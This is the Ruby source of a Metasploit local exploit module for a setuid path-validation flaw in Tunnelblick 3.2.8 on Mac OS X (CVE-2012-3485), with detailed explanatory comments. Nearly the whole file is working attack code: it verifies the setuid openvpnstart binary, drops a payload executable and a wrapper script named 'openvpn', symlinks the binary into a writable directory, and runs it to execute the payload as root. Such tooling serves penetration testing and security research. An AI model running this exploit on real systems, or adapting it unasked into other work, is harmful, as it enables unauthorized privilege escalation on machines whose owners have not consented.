GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Module metadata and datastore options.
  #
  # Both options are paths on the *target* session (hence OptString rather
  # than OptPath): WritableDir is where the module stages its files and
  # Tunnelblick is the setuid openvpnstart binary whose behaviour is abused.
  # Neither value is shell-quoted where it is interpolated into the
  # cmd_exec strings in #check, #clean and #exploit, so a path containing
  # whitespace or shell metacharacters will break or alter those commands.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Setuid Tunnelblick Privilege Escalation',
          'Description' => %q{
            This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
            vulnerability exists in the setuid openvpnstart, where an insufficient
            validation of path names allows execution of arbitrary shell scripts as root.
            This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099
            over Mac OS X 10.7.5.
          },
          'References' => [
            [ 'CVE', '2012-3485' ],
            [ 'OSVDB', '84706' ],
            [ 'EDB', '20443' ],
            [ 'URL', 'http://blog.zx2c4.com/791' ]
          ],
          'License' => MSF_LICENSE,
          'Author' => [
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
            'juan vazquez' # Metasploit module
          ],
          'DisclosureDate' => '2012-08-11',
          'Platform' => 'osx',
          'Arch' => [ ARCH_X86, ARCH_X64 ],
          'SessionTypes' => [ 'shell' ],
          'Targets' => [
            [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
            [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
          ],
          # PrependSetresuid is a payload-side option; presumably it makes the
          # dropped payload call setresuid() so the root identity inherited from
          # the setuid binary is retained -- confirm against the payload docs.
          'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
    register_options [
      # These are not OptPath because it's a *remote* path
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
      OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])
    ]
  end

  # Target-side staging directory, taken from the WritableDir option.
  #
  # @return [String] the directory path ("" if the option is unset)
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Reports whether the target looks vulnerable.
  #
  # Two conditions are tested: the Tunnelblick path exists as a file, and
  # `find` lists it as a regular file owned by root with the setuid bit set
  # (-perm -4000). No version check is performed, so a patched build that
  # still installs openvpnstart as setuid root would also be reported
  # Vulnerable, while a build without the setuid bit is reported Safe.
  #
  # @return [CheckCode] Safe or Vulnerable
  def check
    unless file? datastore['Tunnelblick']
      vprint_error 'openvpnstart not found'
      return CheckCode::Safe
    end

    # Tunnelblick path is interpolated unquoted into the remote command.
    check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")

    unless check.include? 'openvpnstart'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Removes the symlink and the staging directory created by #exploit.
  #
  # Only called from #exploit's failure path. @link is assigned in #exploit,
  # so invoking this before #exploit has run passes nil to file_rm.
  def clean
    file_rm(@link)
    cmd_exec("rm -rf #{base_dir}/openvpn")
  end

  # Runs the exploit. Aborts when the session is already root, when #check
  # does not return Vulnerable, or when base_dir is not writable.
  #
  # Artifacts written to the target, all under base_dir:
  #   openvpn/openvpn-0/<8 random letters>  the payload executable
  #   openvpn/openvpn-0/openvpn             a two-line sh wrapper that runs it
  #   <8 random letters>                    a symlink to the openvpnstart binary
  # The wrapper's name and directory are fixed, only the executable and
  # symlink names are randomised. The symlink is then executed with the
  # arguments "OpenVPNInfo 0". The wrapper is named "openvpn" and placed in
  # openvpn/openvpn-0 next to the symlink presumably because openvpnstart
  # resolves the openvpn binary relative to its own invocation path (the
  # path-validation flaw named in the description) -- confirm against the
  # advisory. On success the files are not removed and only a warning is
  # printed; on a cmd_exec error they are removed via #clean. The bare
  # rescue catches StandardError only.
  #
  # @return [void]
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    print_status("Creating directory...")
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

    exe_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{@exe_file}"

    # Squiggly heredoc strips the leading indentation, so the script is
    # exactly "#!/bin/sh" followed by the payload path.
    evil_sh = <<~EOF
      #!/bin/sh
      #{@exe_file}
    EOF

    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
    print_status("Dropping shell script #{@sh_file}...")
    write_file(@sh_file, evil_sh)
    cmd_exec "chmod +x #{@sh_file}"

    link_name = rand_text_alpha(8)
    @link = "#{base_dir}/#{link_name}"
    print_status("Creating symlink #{@link}...")
    # Both paths are interpolated unquoted; -f overwrites an existing link.
    cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"

    print_status("Running...")
    begin
      cmd_exec "#{@link} OpenVPNInfo 0"
    rescue
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
      clean
      return
    end
    # Success path leaves the staged files on the target.
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
  end
end